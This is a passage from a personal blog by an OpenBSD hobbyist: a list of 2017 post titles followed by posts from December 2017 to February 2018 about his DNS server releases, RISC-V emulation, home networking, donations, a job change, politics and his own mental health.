February 21st, 2017 - ZeroPager.de domain about to expire
February 24th, 2017 - Networking Plans for future Computers in my Home
February 24th, 2017 - Four years in this ol' place
February 26th, 2017 - My first SIP ALG program
March 4th, 2017 - Ditch the Computers for Elections!
March 5th, 2017 - When I fell into the EU's lap, or, what's wrong with you?
March 5th, 2017 - The car I intend to buy
March 7th, 2017 - New VPS
March 8th, 2017 - The North Sea's deepest point
March 8th, 2017 - OpenBSD 6.1 will be released on May 1st
March 12th, 2017 - A thought just came...are humans in the way?
March 12th, 2017 - Replaced SPF with TXT records
March 14th, 2017 - Let's just end this here
March 16th, 2017 - We're 10 cm's from the Sun (1mm)
March 19th, 2017 - The only way to outdo Facebook/Google/Silicon Valley and Co.
March 19th, 2017 - Tomorrow is Equinox
March 23rd, 2017 - When Algorithms Fail Humans
March 26th, 2017 - Last night Europe turned on Summer Time
March 26th, 2017 - Ex-Ledward Barracks starting to be demolished
March 27th, 2017 - What science should focus on in my opinion
March 27th, 2017 - Totally disagree with this SP.ON. article
March 27th, 2017 - Turned down the heat
April 1st, 2017 - Reinhard Tgahrt, Rest In Peace
April 2nd, 2017 - I've left parship.de, unsuccessfully
April 3rd, 2017 - My Bloomin' System
April 5th, 2017 - I'm ready to go back to dating
April 8th, 2017 - I identify with Goldflipper from OpenBSD 3.2 Release
April 11th, 2017 - First draft of the Goldflipper story
April 12th, 2017 - OpenBSD 6.1 was released yesterday
April 12th, 2017 - Registered Goldflipper.DE
April 14th, 2017 - Upgraded most my servers and hosts to OpenBSD 6.1
April 17th, 2017 - Purchased/Ordered a Wacom CTL-490DW
April 18th, 2017 - Von der Leyen and Bundeswehr should listen to this
April 21th, 2017 - Got the Wacom CTL-490
April 21th, 2017 - First draft of image of Goldflipper attack
April 21th, 2017 - Second image for Goldflippers attack
April 21th, 2017 - Goldflippers escape
April 24th, 2017 - Goldflipper is detected
April 24th, 2017 - Goldflipper's new solarscale suit
April 24th, 2017 - Government issued national ID card online
May 1st, 2017 - In 6 days we're 8 years old (with history)
May 8th, 2017 - Why do we need more than one State-run TV station?
May 11th, 2017 - Goodbye Soekris! Pity to see you go!
May 18th, 2017 - Purchased a 4TB external USB3 harddrive
May 22nd, 2017 - Purchased 2 WR-1043ND Routers for Freifunk
May 25th, 2017 - Built an aggregator for big files
May 26th, 2017 - Played with my wacom a few days ago...
May 30th, 2017 - Launched first page of http://goldflipper.de
June 1st, 2017 - Why I think America is greedy, under Trump's presidency
June 8th, 2017 - Registered freifunk-schweinfurt.de
June 8th, 2017 - Donation Time: OpenBSD gets 50 EUR
June 8th, 2017 - Schizophrenia does not 'burden' society
June 12th, 2017 - This is the 1171st article of this blog
June 18th, 2017 - 100 million migrants, due north
June 19th, 2017 - Solstice in 2 days
June 19th, 2017 - Turned the fan on first time for 2017
June 22th, 2017 - I'm against governments hacking our devices
June 23th, 2017 - My new xlock with suspend
June 25th, 2017 - 300,000 victims
June 27th, 2017 - Changes with DelphinusDNS
June 27th, 2017 - Donated $10 USD to FreeBSD Foundation
June 29th, 2017 - The endless fight around Freifunk
June 30th, 2017 - Das Internet darf kein rechtsfreier Raum sein
July 3rd, 2017 - Who I'm voting for in 2017
July 4th, 2017 - My new Network Map 2017
July 4th, 2017 - Wrote a donation for F3 Netze e.V.
July 8th, 2017 - Nuclear Powerstations should not be on the Net
July 9th, 2017 - Google, Apple and co, how does that work?
July 9th, 2017 - Purchased two books from Amazon
July 10th, 2017 - When you're at a crossroad
July 10th, 2017 - Food for the human people!
July 10th, 2017 - On Friday the UNIX timestamp turns 1500000000
July 11th, 2017 - Delphinusdnsd is pledged
July 12th, 2017 - New surveillance powers in the Netherlands
July 13th, 2017 - Hamburg G20
July 16th, 2017 - Putting the car on ice
July 17th, 2017 - America, you're more than great...
July 18th, 2017 - Brainstorm why aliens haven't been found yet
July 19th, 2017 - Provided a patch to OpenBSD ifconfig(8)
July 19th, 2017 - Difficulties in recruiting ICT specialists reported in the EU
July 22th, 2017 - Purchased a used Ubiquiti Edgerouter
July 23th, 2017 - Newly planned network at home
July 23th, 2017 - Puzzled by the Ross 128 story
July 27th, 2017 - Dmesg from zeta.centroid.eu
July 29th, 2017 - Finished the story of Goldflipper
July 30th, 2017 - The private space race
August 06th, 2017 - I tip my hat to SHA2017
August 7th, 2017 - SOHCAHTOA.bc
August 8th, 2017 - Donated to OpenBSD
August 10th, 2017 - It's actually been a perfect summer
August 11th, 2017 - Dead Bird on my Balcony
August 12th, 2017 - It would make a difference to me
August 15th, 2017 - IKE between OpenBSD and FreeBSD
August 16th, 2017 - I'm waiting four more years for a car
August 17th, 2017 - AVM FRITZ!WLAN Repeater 300E supported in LEDE
August 17th, 2017 - Don't attack my 1000 Friends
August 18th, 2017 - Why security certifications for programs don't work
August 19th, 2017 - Switched my password convention
August 21st, 2017 - A small shell script game around Pythagoras Theorem
August 21st, 2017 - This is as close as I got to the Eclipse
August 22nd, 2017 - My depiction of the Tree of Life
August 22nd, 2017 - Chirag Upreti made this Impossible Photo
August 23rd, 2017 - Politics: Not the Union, not the SPD, and not the Greens...
August 23rd, 2017 - Donated 15 EUR to F3 Netze
August 23rd, 2017 - Changed nameserver for delphinusdns.org
August 24th, 2017 - Added double the RAM and double the SSD to Omega
August 25th, 2017 - 137.226.113.0/24 can't lookup my DNS anymore
August 28th, 2017 - Ordered three books
August 30th, 2017 - Change has begun
August 30th, 2017 - Please welcome this website to Germany
September 1st, 2017 - The last leg of Summer 2017
September 2nd, 2017 - Cancelled supercluster for September 17, 2017
September 3rd, 2017 - Wrote a patch for babel routing daemon
September 4th, 2017 - ARD #5kampf politics round
September 5th, 2017 - When will we get a manned space program for Germany/Europe?
September 7th, 2017 - The EU Panopticon
September 9th, 2017 - My hypothetical blueprint for an Information Age
September 11th, 2017 - Schweinfurt public transport got more expensive
September 12th, 2017 - Got a solar panel for my west window
September 14th, 2017 - Turned up the heat for 2017/2018
September 15th, 2017 - Politics: 9 days until Germany votes
September 15th, 2017 - Leaving Google services soon
September 17th, 2017 - Supercluster.Virgostar.NET is no more
September 17th, 2017 - Ordered a new Book
September 17th, 2017 - Left google services
September 18th, 2017 - Updated truncation code on delphinusdnsd
September 19th, 2017 - My Solar Panel and Me
September 20th, 2017 - Revamped www.solarscale.de
September 23rd, 2017 - Germany goes to the polls tomorrow
September 24th, 2017 - Not as disappointed as last election, but it's bad...
September 27th, 2017 - Open Letter to Tim Cook at Apple
September 27th, 2017 - With these books I hope to program C++ on Windows
September 28th, 2017 - Autumn in full swing
September 30th, 2017 - Two crows waiting for sunrise, watching
September 30th, 2017 - The space race to the moon
September 30th, 2017 - Are you colonizing Mars? A comparison with Mercury..
October 3rd, 2017 - I said something like that...
October 4th, 2017 - Ported delphinusdnsd-current to Linux
October 7th, 2017 - Switched on the Solar Router
October 9th, 2017 - Temporarily going back to AC
October 9th, 2017 - OpenBSD 6.2 released today
October 9th, 2017 - Donation time again
October 14th, 2017 - A 49 qubit Google Quantum Computer by end of year?
October 16th, 2017 - Krack Attack, WPA2 broken?
October 17th, 2017 - Finished upgrades to 6.2
October 24th, 2017 - Purchased Fundraiser Tees
October 27th, 2017 - Delphinusdnsd: What's ahead in the next two months
October 28th, 2017 - Purchased last batch of books for year
October 28th, 2017 - Network re-arranging
October 30th, 2017 - What it tells me
November 2nd, 2017 - 20 Years since I started at Globalserve.NET
November 3rd, 2017 - Internet bandwidths
November 4th, 2017 - The TriNet
November 4th, 2017 - Mom is back in the hospital
November 6th, 2017 - Reparations for Greece but not for Poland
November 10th, 2017 - My high risk investment
November 12th, 2017 - Politics: Coal
November 13th, 2017 - The giant void google and co leave behind
November 13th, 2017 - Ruthenium 106 over Europe
November 13th, 2017 - Subscribed to Golem.de for 18EUR for 6 months
November 16th, 2017 - Feeling under the weather today
November 21st, 2017 - Coalition with FDP didn't work out? Die Linke?
November 23rd, 2017 - What the Right Wingers want to achieve
November 25th, 2017 - Delphinusdnsd Flowchart 2017
November 25th, 2017 - Possibly applying to Prototypefund.DE next year
November 27th, 2017 - I tightened the pledge on delphinusdnsd a little
November 27th, 2017 - What I want in delphinusdnsd
November 29th, 2017 - My pledge is tighter!
December 1st, 2017 - How many levels of government do you have in the EU?
December 4th, 2017 - Yesterday was first snow day for 2017/2018
December 5th, 2017 - In the EU, can journalists be safe?
December 5th, 2017 - Are the Ice Giants leaving Earth?
December 8th, 2017 - Donation time
This is the first time I did this with a bunch of UNIX commands, such as AWK,
sed, head, while, read... :-) it's a lot less effort. Let me know of mistakes.
Delphinusdnsd and execpromises
December 12th, 2017
Delphinusdnsd uses pledge in OpenBSD. But pledge is changing, as of today
Theo put a new execpromises field into pledge as the second argument. Since
I'm aiming for a January 1st release and OpenBSD 6.2 is still using the old
pledge I will keep it with the old syntax. As soon as 6.3 is released I'll
probably roll a minor patch release with the pledge syntax changed. What if
you run OpenBSD -current and want to try out Delphinusdnsd on January 1st?
Then I believe you'll have to fix the pledge parts yourself, unless I do an
#ifdef notyet in the source, I'm not sure yet how I'll do that. I may even
do an #ifdef NEWPLEDGE or something we'll see how it goes.
Delphinusdnsd is pretty well on track. I have designated December 27, 28, 29
and 30th to do the last bits before the new release. If I get distracted the
release will happen later than January 1st, (like last year on January 28th).
What's left to do is making sure all other platforms work (without pledge of
course) and the -n flag functionality I want to get in place so that people
can use delphinusdnsd with -n without problems. I don't use -n myself
personally so I'm unaware of problems but I can only think that there might
be some contention.
Solstice in four days
December 17th, 2017
The december solstice is
upon us again in four days. Happy celebrations!
How much science in a day, week, month?
December 19th, 2017
In my life I experience very little science. A scientist would probably
be concerned how little science we're exposed to. Have you ever noticed
that the newspaper that you read is more about politicial opinion and may
have little to no science reports? When we sit down and say "Someone
oughta invent something", it should be us. Only we don't have the background
or the habit of looking at something scientifically. I can only explain
from a perspective that has a complete void of science.
Then there is the
freedom of access to science. It exists but you have to really try hard to
find scientific data and papers, it's almost not worth it. One event I can
look back is when I searched for astrometry data from GAIA an ESA mission,
whether this data was complete is another story. For example I did not
locate close stars such as Alpha Centauri or Sirius in the data. But it
started with Ross 128, so perhaps they left the closest stars out.
I hope more news reports cover science and have a complete biography to
online sources to back up somethign. I hope this will happen in the near
future. I hope we'll exit the 16th century way of living and enter the
21st century.
Happy December Solstice!
December 21th, 2017
This is the shortest day of the northern hemisphere. May your days get
longer :-).
Merry Christmas
December 24th, 2017
Tonight is Christmas Eve and we're going to decorate a few branches of
evergreen trees. It'll be a modest Christmas for us. What I want to say
to the whole world... Merry Christmas and Peace on Earth!
Donated 10 EUR to F3 Netze
December 25th, 2017
Just a little something for Christmas, it's not the world, but can help.
F3 Netze is an organisation that evolved out of Freifunk Franken in order
to provide free infrastructure to the region where I live.
What I got for Christmas
December 26th, 2017
I got a book called "Das Erwachen" by Andreas Brandhorst. It is about an AI
awakening I guess, and at the same time it's dawning on humans that it's a
trap. I read 80 pages so far since Christmas Eve. Should be interesting.
I'm not sure if I like it or dislike it... funny would be if it was written
by an AI.
Donated 10 USD to Mozilla
December 27th, 2017
I got notices from Mozilla to donate. So I gave them 10 USD. I use
Firefox and Thunderbird on OpenBSD.
Delphinusdnsd 1.2.0
December 28th, 2017
A few hours ago I released delphinusdnsd 1.2.0. The development for that
release cycle took 11 months. Here a snippet from the CHANGES file in the
source:
Changes in RELEASE_1_2 from RELEASE_1_1
- remove SPF support (deprecated RFC 7208 section 3.1)
- add TLSA anyreply support (affects AXFR)
- change BerkeleyDB to tree(3) RB_* macros (faster?)
- fix EDNS compliancy: https://ednscomp.isc.org/ednscomp/5a70566c18
- fix truncation code and give empty answers with TC bit set when appropriate
- fix CNAME's with DNSSEC
- fix PTR's with DNSSEC
- move to imsg functions with privsep for IPC messaging
- OpenBSD delphinusdnsd is pledged
I would like to thank everyone and everything that supported me writing on
this DNS server. It is my heart and soul. It also keeps me out of trouble,
I hope. I started writing on Delphinusdnsd in 2005. This is its thirteenth
year. You can grab the download
here. Thanks!
Happy New Year 2018
December 31st, 2017
In Kiribati it was new years already. In Australia as well. We have 7 hours
to go. Soon soon. I want to wish everyone a happy new years 2018.
10 USD/year per domain on average
January 1st, 2018
This morning I renewed and paid for 8 domains of mine, around 160 USD. I have
enabled privacy options as well. Interesting is that the lions share went
into the .net and .org domains (around 90 USD for those two). Somehow it seems
the .de domains that I have are really cheap. I renewed for two years.
Next is DNSSEC'ing more domains and looking at letsencrypt for centroid.eu.
Digitally signed two domains
January 1st, 2018
I have signed two domains, freifunk-schweinfurt.de and delphinusdns.org for
DNSSEC. The signing of the 4096 bit keylength RSA-512 went eventless. However
the delphinusdnsd server did not want to load those zones due to the increased
length of the signed text. I finally found the bug and will be making a
correction to delphinusdnsd later. I will probably release 1.2.1 in the next
few days.
Delphinusdnsd 1.2.1 Released
January 1st, 2018
This is a small bugfix to allow delphinusdnsd to start up after signing the
zone with a 4096 bit key. I haven't tried any higher, I have a few unsigned
zones still and will be able to use them for testing....eventually. Didn't
think I'd have a minor release this quickly after the 1.2.0 release. The
download is here.
Intel, Meltdown and Insider Trading?
January 4th, 2018
If you read the Acknowledgements of the meltdown paper found at the meltdown and spectre website, it is said that Jann Horn informed Intel of the
bug in June of 2017. In late November of 2017 the CEO of Intel sold all his
stocks, which to me is highly suspect of insider trading... (Intel Inside?).
The story about the selling of the stocks (worth 11 million $) is here. I don't know if this is good on Intels part. I'm very mad that we've
been ripped off since 1995! So my 486 DX/2 was likely already vulnerable.
First fix will be done for amd64, then i386 and last ARM.
Starting to buy books for 2018
January 10th, 2018
I have ordered:
The RISC-V Reader: An Open Architecture Atlas - Patterson & Waterman
Computer Organization and Design: The Hardware Software Interface: RISC-V Edition - Patterson & Hennessy
The latter book I have already but it's from 1999, so I'm curious how they changed it. It also is a MIPS version which I never used. I'm very curious on the
RISC-V architecture and hoping that eventually there will be an OpenBSD port to this (It exists in NetBSD and FreeBSD so porting efforts have some help by example).
How to build riscv-qemu on OpenBSD
January 10th, 2018
As you know I lately became interested in RISC-V. Here is the webpage on
how to build riscv-qemu so that you can simulate the RISC-V processor:
Also I have a modification from Method 1a that worked for me on OpenBSD, it's
probably best if you install the regular qemu beforehand via pkg_add or via
the ports system so that everything is in place as on my computer:
I install in /usr/local/riscv so that the ports/pkg system does not get
polluted or clobbered. I then ran the example Linux busybox image provided
on the riscv page:
# uname -a
Linux ucbvax 4.6.2-00041-g030e817-dirty #2 Mon Dec 19 08:48:07 PST 2016 riscv64 GNU/Linux
I think it worked. Also to make sure that this works you must have a wxallowed
filesystem where the binaries are in. Otherwise you'll see it say this in
dmesg:
qemu-system-risc(23987): mprotect W^X violation
Enjoy! I know I will.
Mid-January Rainbow
January 16th, 2018
I sighted this rainbow out of my east side windows.
I made a few more pictures about a minute later it started to sleet/snow.
Freifunk, 1043's seem to be the next 841's
January 20th, 2018
I took a look at Freifunk Stuttgart today and noticed they recommend 1043
routers because the 841's are not supported anymore. The 1043's are about
twice the cost of a 841 but coming down. They dropped the USB port in newer
versions so that would prevent playing with chaoskeys on this hardware.
But there is another model the C7 Archer that has dual 5GHz/2.4GHz modes.
Those are almost twice as much as a 1043, but would cut hardware if one is
going into the 5GHz spectrum. That's something that interests me a lot.
We'll see how it works out.
Registered EnhancedRISC.de
January 21th, 2018
As I'M a fan of RISC architecture (had a Mac G4 Cube a while back) I registered
this domain. Another piece of news is that I may be going to Embeddedworld
in Nuremberg February 27th, to view their RISC-V presentations. I'M looking to
take a vacation day that day.
Electricity for 2017
January 22nd, 2018
I got my electricity bill for 2017.
Year
Night
Day
Total
2013
6941
1276
8217
2014
6906
1323
8229
2015
10151
1452
11603
2016
9643
1420
11063
2017
9788
1485
11273
Better than 2015, worse than 2016. I'm not saving much. On top of that
electricity got a bit more expensive, so I'm paying back a bit of money.
Effing bills ;-)!
Defectiveness is my word
January 22nd, 2018
I have the following domains:
solarscale.de
virgostar.net
delphinusdns.org
enhancedRISC.de
centroid.eu
dtschland.eu
schweinfurtdating.de
freifunk-schweinfurt.de
goldflipper.de
There is a tenth but I'm not revealing it. It starts with an S though. Now
I took all the first letters of these domains (which I btw randomly selected)
and grepped them without the g for goldflipper. I got these words:
defectiveness
defervesce
defervescence
defervescent
devicefulness
diffractiveness
disinfective
diversification
nondiversification
overdiversification
overfranchised
undefectiveness
unvouchsafed
I like defectiveness or "goldflipper defectiveness" a lot because my nick is
buggy and a buggy computer part is defective. Interesting anyhow, notice there
is an undefectiveness as well, that would match.
I have taken on a new job
January 26th, 2018
Today we signed the contracts (dated wednesday the 24th), and I gave notice
at my old employer that I'll be leaving them. I'm starting a new job working
with POWER based AIX systems and Linux on POWER/OPENPOWER. POWER architecture
is an acronym and stands for Performance Optimization With Enhanced RISC.
RISC being an acronym as well for Reduced Instruction Set Computer which you
may know because I mentioned it before for RISC-V the fifth version of RISC.
I have also made a CNAME to remember the POWER acronyms better:
venus$ ping pow.enhancedrisc.de
PING performance.optimization.with.enhancedrisc.de (78.47.14.22): 56 data bytes
64 bytes from 78.47.14.22: icmp_seq=0 ttl=248 time=19.505 ms
64 bytes from 78.47.14.22: icmp_seq=1 ttl=248 time=19.251 ms
64 bytes from 78.47.14.22: icmp_seq=2 ttl=248 time=19.549 ms
^C
--- performance.optimization.with.enhancedrisc.de ping statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 19.251/19.435/19.549/0.131 ms
So there it is. A POWER computer is based in part on PowerPC that was used for
G3, G4, G5 Macs. I'm really excited by this new change. I start on March 1st,
2018 in full-time.
To systematically spy is akin to colonization
January 30th, 2018
In this article (german) here,
it is reported that China was systematically spying on the African Union
parliament. One parliament member said this "If the chinese spied on us it's
not so much a problem, because they never colonized us, supported sovereignty
and help with the african economy". That may be true, but I think this member
of parliament doesn't understand the Internet well. When hackers speak of
other hackers taking control of a box they speak of "0wning" that box. The
word 'to own' means that you lost your property to someone else. If that isn't
akin to colonization then I'll be danged. China owned the entire network from
the beginning and microphones and other spy tools were found. I think they
were caught red handed. I don't have any advise for the AU here, other than
the fact to build up your own education of the Internet, the RFC's are open
at least, but they already knew that I bet.
What can the brain do?
January 31st, 2018
I've wished this book for my birthday (in march).
It is about the sonar in dolphins. I came across some link (which I can't
remember it's location now), that said that dolphins got the ability to use
sonar 15 million years ago and that made them more intelligent than humans at
the time. Considering that sound travels in water at 1700 meters per second.
An object 1.7 meters away would cover 1/1000 seconds or 1 ms. The round trip
of the sound bouncing off the object would be 2 ms. You try reacting to any
thing in 2 ms! I wish you luck! So not only are dolphin brains faster than
humans brains, they have been doing so for 15 million years! Birds are said
to have been the survivors of the dinosaurs which lived 100's of millions years
ago. Birds have an exceptionally small brain compared to humans but what if
they figured out a way to compress brain functions? Where we have a relatively
large brain in comparison with most mammals, birds brains are about 2 cm if not
smaller. In English there exist what I would guess 20,000 words. For someone to know all these words requires a high IQ. But a bird may have less "words" in
its brain and can tell apart a car from a tree (one hopes). What a bird lacks
is the mouth functions to be able to speak a word (with exception to parrots
perhaps). I wonder if birds and other mammals have quicker but compressed
brains in order to have similar brain function to humans? We seem to be super
slow compared to a dolphin. I just wanted to paint a what if. Also interesting is that CPU's have compressed instructions (see RISC-V 'C' section). So why
not brains?
I've turned off obfuscation in this blog
February 1st, 2018
I have turned off the obfuscation of this blog. This is because of Meltdown
and particularily spectre attack. People have started turning off their
javascripts and don't trust sites that require them turned on. Thanks to
#openbsd on efnet for the hint on doing this (it's a week later but better than
never). Will this blog ever be TLS encrypted? Who knows...
Psychosis: a needed thing for 21st century life?
February 1st, 2018
In 2001 I had major achievements while not working but I was coding a lot and
learning. The stress I took on, eventually caused a psychosis in 2002.
However it's 16 years later and I wonder if the planned way for an IT person is
to have a psychosis... For me the Internet came since 1994 (as a door in a
BBS) and steadily grew into our lives. The networking of all of humanity. The
dangers of cyberweapons, viruses, malware and the changing of minds. On the
Internet there is injustices not over material things but over bits and bytes.
Games for example. People get heavily emotional because they feel helpless
over scripted adversaries and coding geniuses. I've been there. Everything
moved so fast for my generation, it must be worst for other generations.
Computers now are 1000 times more capable than 20 years ago. While we can
easily upgrade computers, upgrading the mind to new tasks is not so easy. I've
been taking meds since 2002/2003 now and I feel my long term memory is
improving I'm starting to remember things again. I hope this is due to the
stuff I take. I'm still a little depressed, or at the verge because I feel
my mood swings quickly when I read something emotional. I see others around
me fighting with emotions as well, but we can get through this I think. Let's
take it this way... machines are on the rise to replace our jobs. AI, robots,
quantum computers, increased awareness of our position in the universe, aliens,
and secret societies and their plans for us. These things do revolve around
us and we have to learn fast as it's a changing thing. Just click on youtube
sometime if you don't get faced with these subjects I'd be surprised. We have
to learn to cope with changes and with better adversaries than us. You can
try and strike out on your own but I hope you can recover. I don't know if
I'm recovering I have a mixture of trauma, fears and a feeling of helplessness
in me, but I keep staying on this path. And working with computers is very
important for me. It's my biggest challenge yet after trying to understand
humans. Is it all needed for the 21st century? I know I'm not the only one
and the old standing that 1% have a psychosis in their life probably isn't
true anymore. I tend to guess there is more than 1% now. We're facing the
biggest challenges of humanity. For millions of years we were on our feet
and walking or running. Now we're sitting and have to make due. Can we
cope? And what about god? I tend to not see myself as religious but rather
as spiritual. There's got to be a creator even though I never saw it in
person. Can we look beyond earth? Earth is a cozy womb (as others may have
said), but what about other worlds? Other structures and other ideas? And
most of all is there other life? I don't think we're the only ones. There
is so many galaxies out there bigger than the milky way. Do we want to be
special? Or do we go out and face the music, that we're not alone. Can we
cope outside of this "we're special" ego? Don't get me wrong, we're very
special, to us. To our little lives. In the grand scheme of things we're
probably not able to cope beyond the little life. We break down, so we
have to find ways to get beyond in intelligence, emotions, perception, mental
state. Beware the propagandas out there.
Administrivia: 2017 -> 2018
February 1st, 2018
The script template I had that I use to vi the articles, did not update the
date to 2018 and it was at 2017 all this time for january. Sorry about that.
Donated 10 EUR to dict.leo.org
February 1st, 2018
A long-time friend that has been translating my inquiries. Often from english
to german, but othertimes the other way around as well. I've also used their
french translators occasionally.
Freedom seems to come with a price
February 4th, 2018
Sifive has made the HiFive Unleashed
available. Announced at FOSDEM 2018. It's $999 though. I'm tempted but have
to do some work with the riscv-qemu first so that it's worth it.
Checksumming of words and Hollywood?
February 7th, 2018
I recently watched Terminator Genesys which was filmed in 2015. I came across
an interesting crib from a while ago on why skynet is genesys. Take a word..
say it's "abc" and now substitute its occurence in the 26 letter alphabet and
add this. So abc would become 1 + 2 + 3. The end result would be 6. Now
find other words that add up to 6 and they are "terminator siblings", for
example EA or ADA all add up to 6. I made a program in ruby to do this once
it's rather simple. A friend of mine also provided a program in awk. They
can be found here I wrote them on May 23rd, 2013. With a bit of script knowledge you
can change these programs to give individual words their checksum.
So now that we have established a method for this, I'll count up some words that
I found with the checksum of 94. amsterdam, genesys, luvox, november, skynet,
snowden, uranus. So according to hollywood snowden is not only skynet but
amsterdam and uranus is it as well.
Here are some other funny comparisons. General is Insane and Admiral is deranged. :-) And lastly my favourite, schizophrenia the term coined by a swiss psychiatrist equals switzerland and victorious. One just needs to look into an english
dictionary I guess :-). Another interesting fact is that saturn is 93, uranus
is 94 and neptune is 95. All in sequence and in their natural order. Notice
that we cannot see uranus and neptune without optic aids. Is there more and
a complex system behind this? I doubt it.
Jive Communications aquired by LogMeIn
February 11th, 2018
For around 350 million dollars. Jive is where I worked as a contractor after
they aquired EasyOfficePhone.com where I worked. I'm departing from Jive
as of January 28th, so I didn't know about this aquisition, but I felt back
then that things weren't heading in my favourable path so I got a new job
which has been in the works since before christmas 2017. There is 14 days
left to work for Jive. I hope the time will go peaceful and I start on
March 1st at my new place of work. Hopefully it'll all work out for me.
New images for the Goldflipper story
February 14th, 2018
As you know I've been writing and drawing about goldflipper. It's somewhat my experience too. Here is the most recent
stuff, starting at goldflipper's
vacation which I did a few days ago. Enjoy.
Several machines died last night
February 17th, 2018
I woke up to 2 machines being down. My network wasn't functioning. So
I rebooted and patched the NUC which was #1. And #2 was my soekris in the
living room. It I couldn't revive and I put an APU1 in its place. But I
lost 4 ports where cables were put in. I'll try to revive it later today.
I also upgraded my router to -current, and patched my VPS's. Something
caused badness.
Delphinusdnsd plans
February 18th, 2018
I have been thinking a bit about delphinusdnsd and the direction I want to take
it this year. So I've come up with a multi-purpose tool for delphinusdnsd
called 'dddctl' that encompasses dd-convert, a restart the daemon function
and a stop the daemon function as well as a config file tester. It's a start
and will
possibly have other functionality as well. dddctl will be written in C and
really is just an expansion from dd-convert (which will join dd-convert.rb in
the attic). I'll also start with key and zone key roll-over method on this
tool. When am I going to start developing this? I'm not sure but I've had
urges to do this for a week or more. Good luck!
Bought three books
February 19th, 2018
I'm starting a new job where there is supposedly lots of shell programming and
my literature on that dates back 22 years which in fact I left in Canada when
I moved. So just to have something to fall back on I purchased these books:
Mastering Unix Shell Scripting: Bash, Bourne, and Korn Shell Scripting for Programmers, System Administrators, and UNIX Gurus: Michael, Randal K.
Bash Pocket Reference: Robbins, Arnold
Even if the new work switches and we don't use shell programming, I would really
like a refresher and update on the korn shell particularily since OpenBSD uses
this for rc.d scripts (they recently switched this from strict bourne shell mode).
I do not want a war
February 19th, 2018
The EU is partially responsible for jealousy and anger toward europeans. It is
because of our success of our union that makes neighouring states angry and
jealous. Yet we are not strong militarily. And that is the problem in itself.
There is a power vacuum and it's being filled with NATO arms. I personally
don't want a war. I want everyone to think about what we can do to save
ourselves before we call for arms. Britain has already left the EU so we are
weakened, but that is not enough for the brutish forces that threaten us.
I'm not gonna be a puppet either by lying to myself that I'm interested in a
foreign woman. For peace? To be held hostage? Screw that. So what to do?
The only historic answer is to build up our military in order to fill the
power vacuum ourselves. Problem with that is that it's seen as aggression it
is akin to fueling the flame of war. Perhaps we have to disband the union and
watch our foes fall over the individual states that are weakened by this. This
is the worst paradox I've lived through in my life and it's getting more dire
as time progresses. If there is aliens out there with solutions now would
be a good time to come to earth with a solution for peace.
FreeBSD's Internal Code of Conduct
February 21st, 2018
The code of conduct, short CoC is a code to protect individuals within FreeBSD.
I think it's a great idea. I have however seen some negative comments
regarding this here. In fact
some derogatory comments were downright disgusting.
I have been confused with someone else before, I believe where people thought
I was a woman, or a man with desires to be a woman. So let me put my stance out.
As a 6 y.o. I once wanted to be a woman or at least have a sister. Thankfully
neither happened because I grew to love to be a man. I respect others who want
to change their gender, but I can't understand their disliking for that gender
that they've been born with.
It's a very complicated topic for me because I
don't want to tread over anyone. When I was faced with someone who wanted to
be a woman we went shopping for boots in a womans shoe store together. I
thought I was liberal about that, but I had trouble understanding it. When I
asked if that person was gay and got a nay it was very difficult for me to
swallow this. Anyhow let's keep it there.
Live your life, is what I want to say. The codex doesn't include only trans-
genders but also the mentally ill or those with a mental challenge.
To those that are in open source and have developed a mental illness I say
"keep your head up" because noone knows what it's like to put everything
on the line, for code. Only those that are mentally ill can understand this.
Thankfully there is medications to treat mental illness. You are
faced with the biggest challenge in life and it's not physical or an object
but it's psychological/mental and we have to use our brains to get to the
glory. The act of taking on any mental challenge is very courageous and
deserves extra credit. If something doesn't work out we break down and get
ill if we try again and again. Some are immune to this others aren't. But
everyone who has worked around difficult code and complex problems can relate
to the point where they stop making sense of things because they tried so
hard.
Overall I'm happy with this codex and I had to think about this a long time,
because something in or about it didn't feel right. Maybe it's the fact that
one would face restrictions in a free medium. My mother always said freedoms
end where they restrict others freedoms. And I believe she's correct anything
else would be selfish thinking.
Downtimes
February 23rd, 2018
I didn't even notice that the webserver was down really because I was busy
here at home fixing up my core router. I lost zeta my octeon core router
I think. It started segfaulting in programs run internally. I'll have to
check it tomorrow when I have some more time.
Recovered Zeta
February 24th, 2018
I have recovered zeta my ex-core router. When I lost venus my livingroom
router last week (probably faulty power supply), I replaced that with a spare
APU1 router I had offline. So then when programs started segfaulting on
zeta I thought something was fishy with RAM. That didn't turn out to be true
as I had messed with /etc/login.conf before that and must have entered wrong
values to the size of the stack limit. That's what started segfaulting programs
on zeta. Anyhow I had a pretty important day then and needed to get back up
on the Internet via VDSL so that my phones work.
I actually had LTE backup
still but can't use SIP over that is in the contract. So I put the APU1 from
the livingroom into the core-router function. I lost 5 used ports and was only
able to connect 3 ports, but it worked.
Today I reinstalled OpenBSD-current on zeta and it seems to function. I did it
a bit different by installing on the internal flash card and not a USB stick.
So I only have 4 GB of space. This seems to work nicely. And zeta is now in
my livingroom. I already have 5 ports used up on it (out of 8). Venus my
soekris router that was in the livingroom originally I'll have to put into an
old case when I find the power supply to it. I'll lose a few ports but it's a
good idea to have a backup router around in case APU1 (gamma) fails. Otherwise
I'm considering buying a backup APU3 just in case.
Donated 20 EUR to F3 Netze
February 24th, 2018
F3 Netze is an organisation that looks after infrastructure at Freifunk Franken.
I have donated 20 EUR so far this year including this donation.
I'm leaving EOP, Jive/LogMeIn on monday
February 24th, 2018
I first joined EOP (easyofficephone.com) in June 2010 or so, shortly after the passing
of my friend Dan. Dan founded EOP with Adam Simpson who then hired
me to look after the FreeBSD and Linux servers. In August 2015 then, Adam
decided to sell the startup to another startup that was much bigger, Jive
Communications. And now I'm the first one of the original EOP crew to leave
Jive.
I'm not really sad, I'm grateful to Adam for giving me this chance and
I learned over the years that Dan was indeed smarter than me (I noticed this on
his old files and configs). I'm also grateful
to Jive to keep me there as long as they did. I'm now placing the network
that I've nurtured for so long in the hands of a pair of system admins who will
hopefully keep the lights on until the lights are turned off.
It wasn't always
easy doing this job. I suffered a low wage (which is common for startups) and
I had to give up on usergroup meets in the area because they conflicted with
the working
times that I worked (because I'm in Europe and EOP is in Canada). I saved
most my money though and I'm in a much better position than I was in 2010
although a bit older too. Underpay has always been a problem for me in general
though, and the highest wage I ever earned was $60K CAD in the year 2000. Life
has taught me that things don't always work out and keep getting better, in
fact I had to make a lot of compromises, in order to have a job at all.
I'm
looking forward to my new job though, and in October or so I'm aiming for
purchasing an electric car. It will cut down the travel time to work in the
